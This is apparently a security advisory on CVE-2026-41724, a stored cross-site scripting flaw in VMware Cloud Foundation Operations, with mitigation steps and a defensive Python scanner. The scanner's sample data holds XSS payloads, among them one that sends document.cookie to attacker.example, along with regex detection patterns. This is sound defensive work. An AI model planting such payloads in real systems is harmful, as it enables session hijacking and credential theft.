Mallory

Severity: High

Stored XSS in VMware Cloud Foundation Operations

Identifiers: CVE-2026-41724, CWE-79

CVE-2026-41724 is a stored cross-site scripting (CWE-79) vulnerability in VMware Cloud Foundation Operations. The Broadcom advisory describes multiple stored XSS flaws: a malicious actor who holds privileges to create policies, views, or text widgets can embed script in that content, and the application later renders the stored content without adequately neutralizing it. When another user views the affected policy, view, or dashboard, the injected script executes in that user's browser with that user's session; if the victim is an administrator, the script can drive administrative actions in the platform on the attacker's behalf.


Analyst brief: impact, mitigation and remediation

Impact

Successful exploitation lets attacker-controlled script run in the browser session of any user who views the injected content in VMware Cloud Foundation Operations, so whatever that user can do (administrative actions, if the victim is an administrator) can be performed through their session without their knowledge. The CVSS v3.1 vector AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H reflects this: network-reachable, low attack complexity, a low-privileged account is required (PR:L, the content-author role), a victim interaction is required (UI:R, viewing the content), and the confidentiality, integrity, and availability impacts are all high. Computed per the CVSS v3.1 specification, that vector yields a base score of 8.0 (High).

Mitigation

If immediate patching is not possible: restrict the ability to create or modify policies, views, and text widgets to a small set of trusted administrators, since that authoring privilege is all the attacker needs; review existing user-created policies, views, and text widgets for injected markup (script elements, inline event handlers, javascript: URIs, including entity-encoded forms); and monitor those objects for unexpected changes. Limit network access to the management interface to administrative networks or a bastion host, and prioritize patch deployment per the Broadcom advisory. None of these steps removes the flaw, which lies in how the application renders stored content; they only reduce who can plant a payload and who can be exposed to one.
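The content review step above is tedious to do by eye across many dashboards, so here is an added Python example (not the vendor's tooling or Mallory's) that runs coarse stored-XSS indicators over a batch of exported policy, view, and text-widget bodies. The record layout, field names, and the `attacker.example` host in the sample data are constructed for this illustration; a real run would feed in whatever your export of those objects looks like. Hits are leads for manual review, not verdicts.

```python
"""Heuristic review of stored user-authored content for XSS payloads (added example)."""
import html
import re

# Constructed sample of exported policy/view/text-widget bodies. The field names
# and the export format are hypothetical, not the product's own schema.
SAMPLE_ITEMS = [
    {"kind": "text_widget", "id": "w-1", "owner": "ops-admin",
     "body": "Cluster health summary for <b>Site A</b>"},
    {"kind": "text_widget", "id": "w-2", "owner": "contractor",
     "body": "<img src=x onerror=\"fetch('https://attacker.example/?c='+document.cookie)\">"},
    {"kind": "view", "id": "v-7", "owner": "contractor",
     "body": "Capacity &lt;script&gt;alert(1)&lt;/script&gt;"},   # entity-encoded payload
    {"kind": "policy", "id": "p-3", "owner": "ops-admin",
     "body": "Name: gold-tier policy"},
    {"kind": "view", "id": "v-9", "owner": "contractor",
     "body": "<a href=\"JaVaScRiPt:void(0)\">details</a>"},        # mixed-case scheme
    {"kind": "text_widget", "id": "w-4", "owner": "ops-admin",
     "body": "<svg/onload=alert(document.domain)>"},              # no whitespace before handler
]

# Each pattern is a coarse indicator of markup that can execute script when rendered
# unescaped. Review hits by hand before acting on them.
PATTERNS = [
    ("script element", re.compile(r"<\s*script\b", re.I)),
    ("inline event handler", re.compile(r"<[^>]*[\s/'\"]on[a-z]+\s*=", re.I)),
    ("javascript: URI", re.compile(r"javascript\s*:", re.I)),
    ("frame/object/embed element", re.compile(r"<\s*(iframe|object|embed)\b", re.I)),
    ("svg/math element", re.compile(r"<\s*(svg|math)\b", re.I)),
]


def normalize(body: str) -> str:
    """Undo encodings a payload may hide behind before matching.

    Entity-decode twice so double-encoded payloads (&amp;lt;script&amp;gt;) surface,
    and drop NUL bytes, which some HTML parsers ignore inside tag names.
    """
    text = html.unescape(html.unescape(body))
    return text.replace("\x00", "")


def scan_item(item: dict) -> list[str]:
    """Return the names of every indicator that matches this item's body."""
    text = normalize(item["body"])
    return [name for name, rx in PATTERNS if rx.search(text)]


def scan_items(items: list[dict]) -> dict[str, list[str]]:
    """Return {item id: [indicator names]} for every item with at least one hit."""
    findings = {}
    for item in items:
        hits = scan_item(item)
        if hits:
            findings[item["id"]] = hits
    return findings


if __name__ == "__main__":
    by_id = {item["id"]: item for item in SAMPLE_ITEMS}
    for item_id, hits in scan_items(SAMPLE_ITEMS).items():
        item = by_id[item_id]
        print(f"{item['kind']} {item_id} (owner {item['owner']}): {', '.join(hits)}")
```

On the sample data the scanner flags four of the six objects and leaves the two plain ones alone; the owner field is included because a hit authored by a low-privileged or external account is exactly the PR:L scenario the advisory describes and deserves the first look.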

Remediation

Broadcom has released security updates that remediate the issue; apply them immediately. Broadcom advisory 37513 identifies VMware Aria Operations 8.18.6 as a fixed version in the related product line; use the advisory to map each affected VMware Cloud Foundation Operations deployment to its fixed release and upgrade accordingly. After patching, treat any administrator who viewed attacker-authored content during the exposure window as potentially compromised: audit administrative changes (user, role, and policy modifications) made in that window, and review or remove stored content from untrusted authors, since a fix to how content is rendered does not necessarily remove payloads that were already stored.

Public exploits

No public exploit code observed for this vulnerability yet.
